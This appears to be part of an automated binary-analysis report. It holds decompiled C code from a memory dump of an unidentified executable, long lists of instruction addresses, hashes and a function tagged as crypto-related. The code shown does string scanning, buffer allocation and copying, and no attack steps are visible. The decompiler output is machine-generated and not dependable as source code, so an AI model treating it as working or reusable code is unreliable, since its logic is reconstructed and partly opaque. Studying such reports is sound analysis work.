																__eflags = _t206 - _t394;
																if(_t206 < _t394) {
																	continue;
																} else {
																	__eflags = _t394 - 0x7fffffff;
																	if(_t394 >= 0x7fffffff) {
																		L100:
																		_t394 = 0x7fffffff;
																	} else {
																		while(1) {
																			__eflags =  *((char*)(_t394 + _t317));
																			if( *((char*)(_t394 + _t317)) == 0) {
																				goto L101;
																			}
																			_t394 = _t394 + 1;
																			__eflags = _t394 - 0x7fffffff;
																			if(_t394 < 0x7fffffff) {
																				continue;
																			} else {
																				goto L100;
																			}
																			goto L101;
																		}
																	}
																}
																goto L101;
															}
															asm("bsf esi, ecx");
															_t394 = _t394 + _t206;
														} else {
															_t394 = 0;
															_t206 =  ~_t206 + 0x10;
															__eflags = _t206;
															while(1) {
																__eflags =  *((char*)(_t394 + _t317));
																if( *((char*)(_t394 + _t317)) == 0) {
																	goto L101;
																}
																_t394 = _t394 + 1;
																__eflags = _t394 - _t206;
																if(_t394 < _t206) {
																	continue;
																} else {
																	goto L94;
																}
																goto L101;
															}
														}
														L101:
														__eflags = _t262;
														if(_t262 == 0) {
															_t207 = 0;
														} else {
															_t295 = _t262 & 0x0000000f;
															__eflags = _t295;
															if(_t295 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_v32 = _t348;
																_t207 =  ~( ~_t295 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t207;
																while(1) {
																	asm("movdqu xmm0, [ebx+ecx]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edi, xmm0");
																	__eflags = _t348;
																	if(_t348 != 0) {
																		break;
																	}
																	_t295 = _t295 + 0x10;
																	__eflags = _t295 - _t207;
																	if(_t295 < _t207) {
																		continue;
																	} else {
																		_t348 = _v32;
																		__eflags = _t207 - 0x7fffffff;
																		if(_t207 >= 0x7fffffff) {
																			L112:
																			_t207 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t207 + _t262));
																				if( *((char*)(_t207 + _t262)) == 0) {
																					goto L113;
																				}
																				_t207 = _t207 + 1;
																				__eflags = _t207 - 0x7fffffff;
																				if(_t207 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																_t237 = _t348;
																asm("bsf eax, eax");
																_t348 = _v32;
																_t207 = _t237 + _t295;
															} else {
																_t207 = 0;
																_t295 =  ~_t295 + 0x10;
																__eflags = _t295;
																while(1) {
																	__eflags =  *((char*)(_t207 + _t262));
																	if( *((char*)(_t207 + _t262)) == 0) {
																		goto L113;
																	}
																	_t207 = _t207 + 1;
																	__eflags = _t207 - _t295;
																	if(_t207 < _t295) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
														}
														L113:
														_t92 = _t207 + 1; // 0x80000000
														_t287 = _t394 + _t92;
														__eflags = _t287;
														if(_t287 != 0) {
															__eflags = _t287 - 0x40;
															_t288 =  <=  ? 0x40 : _t287;
															__eflags = _t348 - _t288;
															if(_t348 < _t288) {
																goto L119;
															}
															goto L131;
														} else {
															__eflags = _t262;
															if(_t262 == 0) {
																__eflags = _t348 - 0x40;
																if(_t348 < 0x40) {
																	goto L117;
																} else {
																	goto L184;
																}
															} else {
																 *_t262 = 0;
																_t221 = 0;
																__eflags = _t348 - 0x40;
																if(_t348 < 0x40) {
																	L117:
																	_t288 = 0x40;
																	L119:
																	_t354 = (_t288 >> 5 >> 0x1a) + _t288 >> 6;
																	_t290 = _t288 & 0x8000003f;
																	__eflags = _t290;
																	if(_t290 < 0) {
																		_t290 = (_t290 - 0x00000001 | 0xffffffc0) + 1;
																		__eflags = _t290;
																	}
																	__eflags = _t290;
																	_t348 = _t354 + (0 | _t290 > 0x00000000) << 6;
																	_push(_t348);
																	_v56 = _t317;
																	_t228 = E00411030();
																	_t317 = _v56;
																	_v52 = _t228;
																	_t399 = _t399 + 4;
																	__eflags = _t262;
																	if(_t262 == 0) {
																		 *_t228 = 0;
																	} else {
																		__eflags = _v52;
																		if(_v52 != 0) {
																			_t291 = _t228;
																			_t230 =  *_t262;
																			 *_t291 = _t230;
																			__eflags = _t230;
																			if(_t230 != 0) {
																				_v68 = _t394;
																				_t231 = 0;
																				__eflags = 0;
																				_v56 = _t317;
																				_v32 = _t348;
																				while(1) {
																					_t231 = _t231 + 1;
																					_t332 =  *((char*)(_t262 + _t231 * 2 - 1));
																					 *(_t291 + _t231 * 2 - 1) = _t332;
																					__eflags = _t332;
																					if(_t332 == 0) {
																						break;
																					}
																					_t333 =  *((char*)(_t262 + _t231 * 2));
																					 *(_t291 + _t231 * 2) = _t333;
																					__eflags = _t333;
																					if(_t333 != 0) {
																						continue;
																					}
																					break;
																				}
																				_t394 = _v68;
																				_t317 = _v56;
																				_t348 = _v32;
																			}
																		}
																		_push(1);
																		_push(_t262);
																		_v56 = _t317;
																		E004110B0();
																		_t317 = _v56;
																		_t399 = _t399 + 8;
																	}
																	_t262 = _v52;
																	L131:
																	_t289 = _t262;
																	__eflags = _t262;
																	if(_t262 == 0) {
																		L184:
																		_t210 = _v36 + 1;
																		_v36 = _t210;
																		__eflags = _t210 -  *_v40;
																		if(_t210 >=  *_v40) {
																			_t329 = _a4;
																			 *_t329 = 0;
																			 *((intOrPtr*)(_t329 + 4)) = 0;
																			goto L79;
																		} else {
																			__eflags = _a8;
																			if(_a8 != 0) {
																				goto L180;
																			} else {
																				continue;
																			}
																			goto L194;
																		}
																	} else {
																		_t221 =  *_t262;
																		goto L133;
																	}
																} else {
																	_t289 = _t262;
																	L133:
																	__eflags = _t221;
																	if(_t221 != 0) {
																		_v32 = _t348;
																		_t225 = 0;
																		__eflags = 0;
																		while(1) {
																			_t225 = _t225 + 1;
																			_t356 = _t262 + _t225 * 2;
																			__eflags =  *(_t356 - 1);
																			_t120 = _t356 - 1; // 0x7fffffff
																			_t289 = _t120;
																			if( *(_t356 - 1) == 0) {
																				break;
																			}
																			_t289 = _t356;
																			__eflags =  *_t356;
																			if( *_t356 != 0) {
																				continue;
																			}
																			break;
																		}
																		_t348 = _v32;
																	}
																	_t222 = _t289;
																	__eflags = _t394;
																	if(__eflags != 0) {
																		if(__eflags > 0) {
																			goto L141;
																		}
																	} else {
																		_t394 = 0x7fffffff;
																		L141:
																		_v44 = 0;
																		_v32 = _t348;
																		_v48 = _t262;
																		_t349 = _v44;
																		while(1) {
																			_t265 =  *((char*)(_t349 + _t317));
																			 *(_t349 + _t222) = _t265;
																			__eflags = _t265;
																			if(_t265 == 0) {
																				break;
																			}
																			_t129 = _t222 + 1; // 0x1
																			_t289 = _t349 + _t129;
																			_t349 = _t349 + 1;
																			__eflags = _t349 - _t394;
																			if(_t349 < _t394) {
																				continue;
																			}
																			break;
																		}
																		_t348 = _v32;
																		_t262 = _v48;
																	}
																	_t224 = _v36 + 1;
																	 *_t289 = 0;
																	_v36 = _t224;
																	__eflags = _t224 -  *_v40;
																	if(_t224 >=  *_v40) {
																		L174:
																		_t331 = _a4;
																		_t183 = 0;
																		 *_t331 = 0;
																		 *((intOrPtr*)(_t331 + 4)) = 0;
																		L46:
																		__eflags =  *_t262;
																		if( *_t262 == 0) {
																			L79:
																			_push(0x40);
																			_t373 = E00411030();
																			_t399 = _t399 + 4;
																			_t186 =  *_a4;
																			__eflags = _t186;
																			if(_t186 == 0) {
																				 *_t373 = 0;
																			} else {
																				__eflags = _t373;
																				if(_t373 != 0) {
																					_t303 =  *_t186;
																					 *_t373 = _t303;
																					__eflags = _t303;
																					if(_t303 != 0) {
																						_t281 = 0;
																						__eflags = 0;
																						while(1) {
																							_t281 = _t281 + 1;
																							_t304 =  *((char*)(_t186 + _t281 * 2 - 1));
																							 *(_t373 + _t281 * 2 - 1) = _t304;
																							__eflags = _t304;
																							if(_t304 == 0) {
																								goto L85;
																							}
																							_t305 =  *((char*)(_t186 + _t281 * 2));
																							 *(_t373 + _t281 * 2) = _t305;
																							__eflags = _t305;
																							if(_t305 != 0) {
																								continue;
																							}
																							goto L85;
																						}
																					}
																				}
																				L85:
																				_push(1);
																				_push(_t186);
																				E004110B0();
																				_t399 = _t399 + 8;
																			}
																			_t187 = _a4;
																			 *_t187 = _t373;
																			_t187[1] = 0x40;
																		} else {
																			_t307 = _t262 & 0x0000000f;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				L51:
																				asm("pxor xmm0, xmm0");
																				_t380 =  ~( ~_t307 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t380;
																				while(1) {
																					asm("movdqu xmm1, [ebx+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb eax, xmm1");
																					__eflags = _t183;
																					if(_t183 != 0) {
																						break;
																					}
																					_t307 = _t307 + 0x10;
																					__eflags = _t307 - _t380;
																					if(_t307 < _t380) {
																						continue;
																					} else {
																						__eflags = _t380 - 0x7fffffff;
																						if(_t380 >= 0x7fffffff) {
																							L57:
																							_t380 = 0x7fffffff;
																						} else {
																							while(1) {
																								__eflags =  *((char*)(_t380 + _t262));
																								if( *((char*)(_t380 + _t262)) == 0) {
																									goto L58;
																								}
																								_t380 = _t380 + 1;
																								__eflags = _t380 - 0x7fffffff;
																								if(_t380 < 0x7fffffff) {
																									continue;
																								} else {
																									goto L57;
																								}
																								goto L58;
																							}
																						}
																					}
																					goto L58;
																				}
																				asm("bsf esi, eax");
																				_t380 = _t380 + _t307;
																			} else {
																				_t380 = 0;
																				_t307 =  ~_t307 + 0x10;
																				__eflags = _t307;
																				while(1) {
																					__eflags =  *((char*)(_t380 + _t262));
																					if( *((char*)(_t380 + _t262)) == 0) {
																						goto L58;
																					}
																					_t380 = _t380 + 1;
																					__eflags = _t380 - _t307;
																					if(_t380 < _t307) {
																						continue;
																					} else {
																						goto L51;
																					}
																					goto L58;
																				}
																			}
																			L58:
																			_t51 = _t380 + 1; // 0x80000000
																			_t308 = _t51;
																			__eflags = _t308 - 0x40;
																			_t309 =  <=  ? 0x40 : _t308;
																			__eflags = _t309;
																			if(_t309 > 0) {
																				_t344 = (_t309 >> 5 >> 0x1a) + _t309 >> 6;
																				_t310 = _t309 & 0x8000003f;
																				__eflags = _t310;
																				if(_t310 < 0) {
																					_t310 = (_t310 - 0x00000001 | 0xffffffc0) + 1;
																					__eflags = _t310;
																				}
																				__eflags = _t310;
																				_t346 = _t344 + (0 | _t310 > 0x00000000) << 6;
																				_push(_t346);
																				_t311 = E00411030();
																				_t399 = _t399 + 4;
																				_t282 =  *_a4;
																				__eflags = _t282;
																				if(_t282 == 0) {
																					 *_t311 = 0;
																				} else {
																					__eflags = _t311;
																					if(_t311 != 0) {
																						_t199 =  *_t282;
																						 *_t311 = _t199;
																						__eflags = _t199;
																						if(_t199 != 0) {
																							__eflags = 0;
																							_v68 = _t380;
																							_v48 = _t262;
																							_t264 = 0;
																							while(1) {
																								_t264 = _t264 + 1;
																								_t201 =  *((char*)(_t282 + _t264 * 2 - 1));
																								 *(_t311 + _t264 * 2 - 1) = _t201;
																								__eflags = _t201;
																								if(_t201 == 0) {
																									break;
																								}
																								_t202 =  *((char*)(_t282 + _t264 * 2));
																								 *(_t311 + _t264 * 2) = _t202;
																								__eflags = _t202;
																								if(_t202 != 0) {
																									continue;
																								}
																								break;
																							}
																							_t380 = _v68;
																							_t262 = _v48;
																						}
																					}
																					_push(1);
																					_push(_t282);
																					_v68 = _t311;
																					E004110B0();
																					_t311 = _v68;
																					_t399 = _t399 + 8;
																				}
																				_t196 = _a4;
																				_t196[1] = _t346;
																				 *_t196 = _t311;
																			} else {
																				_t311 = 0;
																			}
																			_t283 = _t262;
																			__eflags = _t311;
																			if(_t311 != 0) {
																				_t347 = 0;
																				while(1) {
																					_t197 =  *_t283;
																					_t347 = _t347 + 1;
																					 *_t311 = _t197;
																					__eflags = _t380;
																					if(_t380 == 0) {
																						goto L77;
																					}
																					__eflags = _t347 - _t380;
																					if(_t347 == _t380) {
																						 *(_t311 + 1) = 0;
																					} else {
																						goto L77;
																					}
																					goto L88;
																					L77:
																					__eflags = _t197;
																					if(_t197 != 0) {
																						_t311 = _t311 + 1;
																						_t283 = _t283 + 1;
																						__eflags = _t283;
																						continue;
																					}
																					goto L88;
																				}
																			}
																		}
																	} else {
																		_t203 = _a8;
																		__eflags = _t203;
																		if(_t203 == 0) {
																			continue;
																		} else {
																			goto L147;
																		}
																		goto L194;
																	}
																}
															}
														}
													}
												} else {
													goto L44;
												}
												goto L88;
											}
											goto L44;
										}
										goto L42;
										L44:
										_t372 = _t204;
										_t203 = _a8;
										_t315 = _t284 + 1;
										__eflags = _t315 -  *_t372;
									} while (_t315 <  *_t372);
									goto L45;
								}
							}
						}
					}
					L88:
					_push(1);
					_push(_t262);
					E004110B0();
					return _a4;
				} else {
					_t335 = _a4;
					_push(0x40);
					 *_t335 = 0;
					 *((intOrPtr*)(_t335 + 4)) = 0;
					_t277 = E00411030();
					_t401 = _t399 + 4;
					_t258 =  *_a4;
					if(_t258 == 0) {
						 *_t277 = 0;
					} else {
						if(_t277 != 0) {
							_t336 =  *_t258;
							 *_t277 = _t336;
							if(_t336 != 0) {
								_t337 = 0;
								while(1) {
									_t337 = _t337 + 1;
									_t298 =  *((char*)(_t258 + _t337 * 2 - 1));
									 *((char*)(_t277 + _t337 * 2 - 1)) = _t298;
									if(_t298 == 0) {
										goto L7;
									}
									_t299 =  *((char*)(_t258 + _t337 * 2));
									 *((char*)(_t277 + _t337 * 2)) = _t299;
									if(_t299 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(1);
						_push(_t258);
						E004110B0();
						_t401 = _t401 + 8;
					}
					_t259 = _a4;
					_t259[1] = 0x40;
					 *_t259 = _t277;
					return _t259;
				}
				L194:
			}

0x00427fc9
0x00427fcc
0x00427fce
0x00427fd2
0x00428048
0x0042804a
0x0042804c
0x0042818b
0x0042818b
0x00428192
0x00428194
0x00428197
0x0042819a
0x0042819d
0x00000000
0x0042819f
0x0042819f
0x00000000
0x0042819f
0x00428052
0x00428052
0x00428055
0x00000000
0x0042805b
0x0042805d
0x0042805d
0x00428060
0x00428082
0x00428086
0x00428092
0x00428092
0x00428098
0x0042809c
0x0042809e
0x0042809e
0x004280a3
0x004280a7
0x004280ab
0x004280ad
0x00000000
0x00000000
0x004280b3
0x004280b6
0x004280b8
0x00000000
0x004280ba
0x004280ba
0x004280be
0x004280c6
0x004280dc
0x004280dc
0x004280c8
0x004280c8
0x004280ca
0x004280ca
0x004280ce
0x00000000
0x00000000
0x004280d4
0x004280d5
0x004280da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004280da
0x00428762
0x00428762
0x004280c6
0x00000000
0x004280b8
0x0042876b
0x00428770
0x00428062
0x00428062
0x0042806c
0x00428070
0x00428070
0x00428073
0x00428073
0x00428077
0x00000000
0x00000000
0x0042807d
0x0042807e
0x00428080
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428080
0x00428779
0x00428779
0x004280e4
0x004280ed
0x004280f0
0x004280f3
0x004280f6
0x004280f8
0x00428116
0x00428119
0x00428119
0x0042811e
0x00428126
0x00428126
0x00428126
0x00428127
0x00428133
0x00428136
0x00428137
0x0042813b
0x00428140
0x00428144
0x00428146
0x0042814d
0x00428155
0x00428159
0x0042815d
0x00428160
0x00428163
0x00428167
0x0042816f
0x0042816f
0x00428172
0x00428173
0x00428175
0x00428177
0x00000000
0x00000000
0x00428179
0x0042817b
0x0042872e
0x00428732
0x00428735
0x00428739
0x00000000
0x00000000
0x00000000
0x0042873d
0x0042873d
0x00428740
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428181
0x00428181
0x00428183
0x00428755
0x00428759
0x0042875c
0x00428189
0x0042816d
0x0042816e
0x0042816e
0x00000000
0x0042816e
0x00000000
0x00428183
0x004280fa
0x004280fa
0x004280fc
0x004280ff
0x004281fc
0x004281fc
0x004281ff
0x00428201
0x00428203
0x00428206
0x00428208
0x00000000
0x00000000
0x00000000
0x00000000
0x00428105
0x00428105
0x004281a4
0x004281a4
0x004281a8
0x004281ad
0x004281b1
0x004281b1
0x004281b3
0x004281ca
0x004281ce
0x004281b5
0x004281b5
0x004281b7
0x00428782
0x00428786
0x0042878a
0x0042878a
0x004281bd
0x004281bd
0x004281c1
0x0042860f
0x00428611
0x00428611
0x00428614
0x0042862c
0x00428630
0x0042863c
0x0042863c
0x00428642
0x00428642
0x00428647
0x0042864b
0x0042864f
0x00428651
0x00000000
0x00000000
0x00428657
0x0042865a
0x0042865c
0x00000000
0x0042865e
0x0042865e
0x00428664
0x00428679
0x00428679
0x00428666
0x00428666
0x00428666
0x0042866a
0x00000000
0x00000000
0x00428670
0x00428671
0x00428677
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428677
0x00000000
0x00428666
0x00428664
0x00000000
0x0042865c
0x004287eb
0x004287ee
0x00000000
0x00428616
0x00428618
0x0042861a
0x0042861a
0x0042861d
0x0042861d
0x00428621
0x00000000
0x00000000
0x00428627
0x00428628
0x0042862a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042862a
0x004287da
0x004287da
0x004287dd
0x004287e3
0x004287e3
0x004287dd
0x00428614
0x0042867e
0x00428683
0x00428683
0x00428686
0x00428689
0x0042868c
0x0042868e
0x0042869e
0x004286a1
0x004286a1
0x004286a7
0x004286af
0x004286af
0x004286af
0x004286b2
0x004286b9
0x004286bc
0x004286c2
0x004286c4
0x004286c7
0x004286c9
0x00428718
0x004286cb
0x004286cb
0x004286cd
0x004286cf
0x004286d2
0x004286d4
0x004286d6
0x004286d8
0x004286dc
0x004286dc
0x004286de
0x004286e2
0x004286e2
0x004286e3
0x004286e8
0x004286ec
0x004286ee
0x00000000
0x00000000
0x004286f0
0x004286f4
0x004286f7
0x004286f9
0x00000000
0x00000000
0x00000000
0x004286f9
0x004286fb
0x004286ff
0x004286ff
0x004286d6
0x00428703
0x00428705
0x00428706
0x0042870a
0x0042870f
0x00428713
0x00428713
0x0042871b
0x0042871b
0x00428721
0x00428724
0x004281d2
0x004281d2
0x004281d2
0x004281d6
0x004281e0
0x004281e2
0x004281e4
0x00000000
0x00000000
0x004281e6
0x004281e9
0x004283bf
0x004283c1
0x00000000
0x004283c7
0x004283c9
0x004283c9
0x004283cc
0x004283e0
0x004283e4
0x004283f0
0x004283f0
0x004283f6
0x004283f6
0x004283fb
0x004283ff
0x00428403
0x00428405
0x00000000
0x00000000
0x0042840b
0x0042840e
0x00428410
0x00000000
0x00428412
0x00428412
0x00428418
0x00428429
0x00428429
0x00000000
0x0042841a
0x0042841a
0x0042841e
0x00000000
0x00000000
0x00428420
0x00428421
0x00428427
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428427
0x0042841a
0x00428418
0x00000000
0x00428410
0x00428809
0x0042880c
0x004283ce
0x004283d0
0x004283d2
0x004283d2
0x004283d5
0x004283d5
0x004283d9
0x00000000
0x00000000
0x004283db
0x004283dc
0x004283de
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004283de
0x004283d5
0x0042842e
0x0042842e
0x00428430
0x00428802
0x00428436
0x00428438
0x00428438
0x0042843b
0x0042844f
0x00428453
0x0042845f
0x00428463
0x00428463
0x00428468
0x00428468
0x0042846d
0x00428471
0x00428475
0x00428477
0x00000000
0x00000000
0x0042847d
0x00428480
0x00428482
0x00000000
0x00428484
0x00428484
0x00428488
0x0042848d
0x0042849d
0x0042849d
0x00000000
0x0042848f
0x0042848f
0x00428493
0x00000000
0x00000000
0x00428495
0x00428496
0x0042849b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042849b
0x0042848f
0x0042848d
0x00000000
0x00428482
0x004287f2
0x004287f4
0x004287f7
0x004287fb
0x0042843d
0x0042843f
0x00428441
0x00428441
0x00428444
0x00428444
0x00428448
0x00000000
0x00000000
0x0042844a
0x0042844b
0x0042844d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042844d
0x00428444
0x0042843b
0x004284a2
0x004284a2
0x004284a2
0x004284a6
0x004284a8
0x004284cf
0x004284d2
0x004284d5
0x004284d7
0x00000000
0x00000000
0x00000000
0x004284aa
0x004284aa
0x004284ac
0x004287a4
0x004287a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004284b2
0x004284b2
0x004284b5
0x004284b7
0x004284ba
0x004284c3
0x004284c3
0x004284dd
0x004284e7
0x004284ea
0x004284ea
0x004284f0
0x004284f8
0x004284f8
0x004284f8
0x004284fb
0x00428502
0x00428505
0x00428506
0x0042850a
0x0042850f
0x00428513
0x00428517
0x0042851a
0x0042851c
0x00428576
0x0042851e
0x0042851e
0x00428523
0x00428525
0x00428527
0x0042852a
0x0042852c
0x0042852e
0x00428530
0x00428533
0x00428533
0x00428535
0x00428539
0x0042853d
0x0042853d
0x0042853e
0x00428543
0x00428547
0x00428549
0x00000000
0x00000000
0x0042854b
0x0042854f
0x00428552
0x00428554
0x00000000
0x00000000
0x00000000
0x00428554
0x00428556
0x00428559
0x0042855d
0x0042855d
0x0042852e
0x00428561
0x00428563
0x00428564
0x00428568
0x0042856d
0x00428571
0x00428571
0x00428579
0x0042857d
0x0042857d
0x0042857f
0x00428581
0x004287ad
0x004287b5
0x004287b6
0x004287ba
0x004287bc
0x004287cb
0x004287d0
0x004287d2
0x00000000
0x004287be
0x004287c2
0x004287c4
0x00000000
0x004287c6
0x00000000
0x004287c6
0x00000000
0x004287c4
0x00428587
0x00428587
0x00000000
0x00428587
0x004284bc
0x004284bc
0x0042858a
0x0042858a
0x0042858c
0x0042858e
0x00428592
0x00428592
0x00428594
0x00428594
0x00428595
0x00428598
0x0042859c
0x0042859c
0x0042859f
0x00000000
0x00000000
0x004285a1
0x004285a3
0x004285a6
0x00000000
0x00000000
0x00000000
0x004285a6
0x004285a8
0x004285a8
0x004285ac
0x004285ae
0x004285b0
0x004285b9
0x00000000
0x00000000
0x004285b2
0x004285b2
0x004285bb
0x004285bb
0x004285c3
0x004285c7
0x004285cb
0x004285cf
0x004285cf
0x004285d3
0x004285d6
0x004285d8
0x00000000
0x00000000
0x004285da
0x004285da
0x004285de
0x004285df
0x004285e1
0x00000000
0x00000000
0x00000000
0x004285e1
0x004285e3
0x004285e7
0x004285e7
0x004285f3
0x004285f4
0x004285f7
0x004285fb
0x004285fd
0x00428746
0x00428746
0x00428749
0x0042874b
0x0042874d
0x0042820e
0x0042820e
0x00428211
0x0042834f
0x0042834f
0x00428356
0x00428358
0x0042835e
0x00428360
0x00428362
0x00428399
0x00428364
0x00428364
0x00428366
0x00428368
0x0042836b
0x0042836d
0x0042836f
0x00428371
0x00428371
0x00428373
0x00428373
0x00428374
0x00428379
0x0042837d
0x0042837f
0x00000000
0x00000000
0x00428381
0x00428385
0x00428388
0x0042838a
0x00000000
0x00000000
0x00000000
0x0042838a
0x00428373
0x0042836f
0x0042838c
0x0042838c
0x0042838e
0x0042838f
0x00428394
0x00428394
0x0042839c
0x0042839f
0x004283a1
0x00428217
0x00428219
0x00428219
0x0042821c
0x00428230
0x00428234
0x00428240
0x00428240
0x00428246
0x00428246
0x0042824b
0x0042824f
0x00428253
0x00428255
0x00000000
0x00000000
0x0042825b
0x0042825e
0x00428260
0x00000000
0x00428262
0x00428262
0x00428268
0x00428279
0x00428279
0x00000000
0x0042826a
0x0042826a
0x0042826e
0x00000000
0x00000000
0x00428270
0x00428271
0x00428277
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428277
0x0042826a
0x00428268
0x00000000
0x00428260
0x0042879a
0x0042879d
0x0042821e
0x00428220
0x00428222
0x00428222
0x00428225
0x00428225
0x00428229
0x00000000
0x00000000
0x0042822b
0x0042822c
0x0042822e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042822e
0x00428225
0x0042827e
0x00428283
0x00428283
0x00428286
0x00428289
0x0042828c
0x0042828e
0x004282a1
0x004282a4
0x004282a4
0x004282aa
0x004282b2
0x004282b2
0x004282b2
0x004282b5
0x004282bc
0x004282bf
0x004282c5
0x004282c7
0x004282cd
0x004282cf
0x004282d1
0x00428320
0x004282d3
0x004282d3
0x004282d5
0x004282d7
0x004282da
0x004282dc
0x004282de
0x004282e0
0x004282e2
0x004282e5
0x004282e9
0x004282eb
0x004282eb
0x004282ec
0x004282f1
0x004282f5
0x004282f7
0x00000000
0x00000000
0x004282f9
0x004282fd
0x00428300
0x00428302
0x00000000
0x00000000
0x00000000
0x00428302
0x00428304
0x00428307
0x00428307
0x004282de
0x0042830b
0x0042830d
0x0042830e
0x00428312
0x00428317
0x0042831b
0x0042831b
0x00428323
0x00428326
0x00428329
0x00428290
0x00428290
0x00428290
0x0042832b
0x0042832d
0x0042832f
0x00428331
0x00428337
0x00428337
0x0042833a
0x0042833b
0x0042833d
0x0042833f
0x00000000
0x00000000
0x00428341
0x00428343
0x00428791
0x00000000
0x00000000
0x00000000
0x00000000
0x00428349
0x00428349
0x0042834b
0x00428335
0x00428336
0x00428336
0x00000000
0x00428336
0x00000000
0x0042834b
0x00428337
0x0042832f
0x00428603
0x00428603
0x00428607
0x00428609
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428609
0x004285fd
0x004284ba
0x004284ac
0x004284a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004281e9
0x00000000
0x004281d2
0x00000000
0x004281ef
0x004281f1
0x004281f3
0x004281f7
0x004281f8
0x004281f8
0x00000000
0x004281b1
0x004280ff
0x004280f8
0x00428055
0x004283a8
0x004283a8
0x004283aa
0x004283ab
0x004283bc
0x00427fd4
0x00427fd4
0x00427fd9
0x00427fdb
0x00427fdd
0x00427fe5
0x00427fe7
0x00427fed
0x00427ff1
0x00428028
0x00427ff3
0x00427ff5
0x00427ff7
0x00427ffa
0x00427ffe
0x00428000
0x00428002
0x00428002
0x00428003
0x00428008
0x0042800e
0x00000000
0x00000000
0x00428010
0x00428014
0x00428019
0x00000000
0x00000000
0x00000000
0x00428019
0x00428002
0x00427ffe
0x0042801b
0x0042801b
0x0042801d
0x0042801e
0x00428023
0x00428023
0x0042802b
0x0042802e
0x00428035
0x00428040
0x00428040
0x00000000

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction ID: 17d19807f381d6098145111a70d0658df1af8336a683da7a9d083464521321a9
Opcode Fuzzy Hash: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction Fuzzy Hash: 1B322B71B067724BD715CE38988032F7AD16FD6310F69866FD8958B391DE39CC42878A

Uniqueness

Uniqueness Score: -1.00%

Function 00418EF0, Relevance: .7, Instructions: 697
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00418EF0(signed int* __ecx, signed int* _a4, unsigned int _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t142;
				signed int* _t144;
				signed int _t147;
				unsigned int _t153;
				signed int _t154;
				signed int* _t159;
				void* _t160;
				signed int _t163;
				signed int _t164;
				signed int _t169;
				signed int _t173;
				signed int* _t175;
				signed int _t179;
				unsigned int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t206;
				signed int _t207;
				unsigned int _t216;
				signed int _t220;
				short* _t224;
				signed int _t226;
				signed int _t230;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t237;
				unsigned int _t242;
				signed int _t243;
				short* _t245;
				short _t246;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed short* _t255;
				void* _t256;
				signed int _t258;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr* _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t279;
				signed int _t284;
				intOrPtr* _t285;
				signed int _t286;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				signed int* _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				unsigned int _t311;
				signed int _t314;
				signed int _t316;
				void* _t317;
				signed int _t318;
				signed int _t319;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t337;
				signed int _t344;
				signed int _t351;
				unsigned int _t354;
				signed int _t361;
				signed int _t363;
				signed int _t366;
				signed int _t367;
				signed int _t369;
				signed int _t370;
				void* _t372;

				_t247 = __ecx;
				_t372 = (_t370 & 0xfffffff0) - 0x14;
				_t354 = _a8;
				if(_t354 == 0 || ( *_t354 & 0x0000ffff) == 0) {
					_t269 = _a4;
					 *_t269 = 0;
					_t327 =  *_t247;
					 *((intOrPtr*)(_t269 + 4)) = 0;
					if(_t327 == 0) {
						L37:
						_push(0x80);
						_t230 = E00411030();
						_t372 = _t372 + 4;
						_t142 =  *_a4;
						__eflags = _t142;
						if(_t142 == 0) {
							__eflags = 0;
							 *_t230 = 0;
						} else {
							__eflags = _t230;
							if(_t230 != 0) {
								_t270 =  *_t142 & 0x0000ffff;
								 *_t230 = _t270;
								__eflags = _t270;
								if(_t270 != 0) {
									_t271 = 0;
									__eflags = 0;
									while(1) {
										_t271 = _t271 + 1;
										_t248 =  *(_t142 + _t271 * 4 - 2) & 0x0000ffff;
										 *(_t230 + _t271 * 4 - 2) = _t248;
										__eflags = _t248;
										if(_t248 == 0) {
											goto L43;
										}
										_t249 =  *(_t142 + _t271 * 4) & 0x0000ffff;
